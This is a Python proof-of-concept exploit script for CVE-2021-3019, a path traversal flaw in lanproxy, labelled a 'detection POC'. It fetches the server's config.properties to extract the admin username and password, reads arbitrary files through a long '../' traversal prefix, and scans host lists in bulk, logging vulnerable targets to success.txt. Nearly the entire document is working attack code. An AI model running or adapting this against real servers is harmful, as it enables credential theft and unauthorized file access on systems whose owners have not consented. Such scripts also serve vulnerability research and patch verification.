#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
'''
@File : urllib.py
@Time : 2021/01/10 21:59:32
@Author : _0xf4n9x_
@Version : 1.0
@Contact : [email protected]
@Desc : None
'''
import sys
import argparse
import os
from urllib import request
from urllib import error
banner = """
###### ## ## ######## ####### ##### ####### ## ####### ##### ## #######
## ## ## ## ## ## ## ## ## ## ## #### ## ## ## ## #### ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ###### ##### ####### ## ## ####### ## ##### ####### ## ## ## ########
## ## ## ## ## ## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
###### ### ######## ######### ##### ######### ###### ####### ##### ###### #######
Author: _0xf4n9x_"""
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4080.0 Safari/537.36 Edg/82.0.453.0"}
def readConf(url):
"""
默认读取配置文件,并通过能否读取配置文件来判断是否存在漏洞
"""
config = [
'config.server.bind',
'config.server.port',
'config.admin.username',
'config.admin.password'
]
path = "/../conf/config.properties"
confUrl = url + path
r = request.Request(confUrl, headers=headers)
try:
with request.urlopen(r, timeout=10) as resp:
confContent = resp.read().decode('utf-8')
for i in config:
if i not in confContent:
print("[-] " + url + " is not vulnerable")
return 'Bye :('
print("[+] " + url + " is vulnerable! :)")
return confContent
except ConnectionResetError:
print("[-] " + url + " Connection reset by peer")
except error.HTTPError as e:
print("[-] " + url + e.code + e.reason)
except error.URLError as e:
print("[-] " + url + e.code + e.reason)
except:
print("[-] " + url + " is not vulnerable")
return 0
def readOtherFile(url, path):
"""
读取任意其他文件
"""
jumpSym = "/../../../../../../../../.."
fullUrl = url + jumpSym + path
r = request.Request(fullUrl, headers=headers)
with request.urlopen(r, timeout=10) as resp:
fileContent = resp.read().decode('utf-8')
print(fileContent)
def run(url, path="/../conf/config.properties"):
if os.path.isfile(url) == False:
# if 'http' not in url:
# url = 'http://' + url
url = 'http://' + url.replace('http://', '').replace('/', '')
if path == "/../conf/config.properties":
print(readConf(url))
else:
if readConf(url) not in [0, 'Bye :(']:
readOtherFile(url, path)
else:
urls = []
with open(url) as target:
urls = target.read().splitlines()
for url in urls:
# if 'http' not in url:
# url = 'http://' + url
url = 'http://' + url.replace('http://', '').replace('/', '')
if readConf(url) not in [0, 'Bye :(']:
with open("success.txt", "a+") as f:
f.write(url + "\n")
f.close()
def main():
parser = argparse.ArgumentParser(
description="CVE-2021-3019 lanproxy arbitrary file read vulnerability detection POC")
parser.add_argument('-u', '--url', type=str,
help="test a single website")
parser.add_argument('-r', '--read', type=str,
help="this parameter is followed by the file name to be read, the configuration file is read by default")
parser.add_argument('-f', '--file', type=str,
help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
args = parser.parse_args()
if len(sys.argv) <= 1:
parser.print_help()
elif sys.argv[1] in ['-u', '--url']:
if len(sys.argv) == 3:
run(args.url)
elif len(sys.argv) == 5:
run(args.url, args.read)
elif sys.argv[1] in ['-f', '--file']:
run(args.file)
if __name__ == "__main__":
print(banner)
main()